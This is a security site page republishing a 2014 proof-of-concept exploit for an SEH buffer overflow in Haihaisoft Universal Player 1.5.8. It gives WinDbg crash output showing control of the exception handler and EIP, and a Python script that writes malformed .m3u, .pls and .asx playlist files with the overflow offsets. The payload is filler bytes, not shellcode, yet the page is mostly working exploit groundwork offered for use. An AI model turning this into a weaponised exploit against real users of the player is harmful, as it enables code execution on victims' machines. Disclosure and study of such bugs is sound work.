首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Haihaisoft Universal Player 1.5.8 (.m3u, .pls, .asx) - Buffer Overflow (SEH)
来源:vfocus.net 作者:Seljan 发布时间:2014-03-26  
#-----------------------------------------------------------------------------#
# Exploit Title: Haihaisoft Universal Player 1.5.8 - Buffer Overflow (SEH)    #
# Date: Mar 25 2014                                                           #
# Exploit Author: Gabor Seljan                                                #
# Software Link: http://www.haihaisoft.com/hup.aspx                           #
# Version: 1.5.8.0                                                            #
# Tested on: Windows XP SP3                                                   #
#-----------------------------------------------------------------------------#
  
# (6ec.57c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=44444444 ecx=0000000f edx=00000000 esi=04bae7d0 edi=44444448
# eip=0069537f esp=04cb7b18 ebp=04cb7b58 iopl=0         nv up ei pl nz na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
# *** ERROR: Module load completed but symbols could not be loaded for mplayerc.exe
# mplayerc+0x29537f:
# 0069537f f3ab            rep stos dword ptr es:[edi]
# 0:005> g
# (6ec.57c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000000 ecx=43434343 edx=7c9032bc esi=00000000 edi=00000000
# eip=43434343 esp=04cb7748 ebp=04cb7768 iopl=0         nv up ei pl zr na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
# 43434343 ??              ???
# 0:005> !exchain
# 04cb775c: ntdll!RtlConvertUlongToLargeInteger+7e (7c9032bc)
# 04cb7b4c: mplayerc+2e2e78 (006e2e78)
# 04cb8b80: 43434343
# Invalid exception stack at 42424242
  
#!/usr/bin/python
  
junk1  = "\x80" * 50;
offset = "\x41" * 1591;
nSEH   = "\x42" * 4;
SEH    = "\x43" * 4;
junk2  = "\x44" * 5000;
  
evil = "http://{junk1}{offset}{nSEH}{SEH}{junk2}".format(**locals())
  
for e in ['m3u', 'pls', 'asx']:
  if e is 'm3u':
    poc = evil
  elif e is 'pls':
    poc = "[playlist]\nFile1={}".format(evil)
  else:
    poc = "<asx version=\"3.0\"><entry><ref href=\"{}\"/></entry></asx>".format(evil)
  try:
    print("[*] Creating poc.%s file..." % e)
    f = open('poc.%s' % e, 'w')
    f.write(poc)
    f.close()
    print("[*] %s file successfully created!" % f.name)
  except:
    print("[!] Error while creating exploit file!")
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Haihaisoft HUPlayer 1.0.4.8 (.
·Katello (Red Hat Satellite) us
·LifeSize UVC Authenticated Rem
·Couchdb 1.5.0 - uuids DoS Expl
·FreePBX config.php Remote Code
·VirusChaser 8.0 - Stack Buffer
·GOMMP 2.2.56.5183 Memory Corru
·IBM Tealeaf CX 8.8 - Remote OS
·VFU 4.10-1.1 Stack Buffer Over
·GOM Video Converter 1.1.0.60 -
·SePortal 2.5 SQL Injection / R
·GOM Media Player (GOMMP) 2.2.5
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved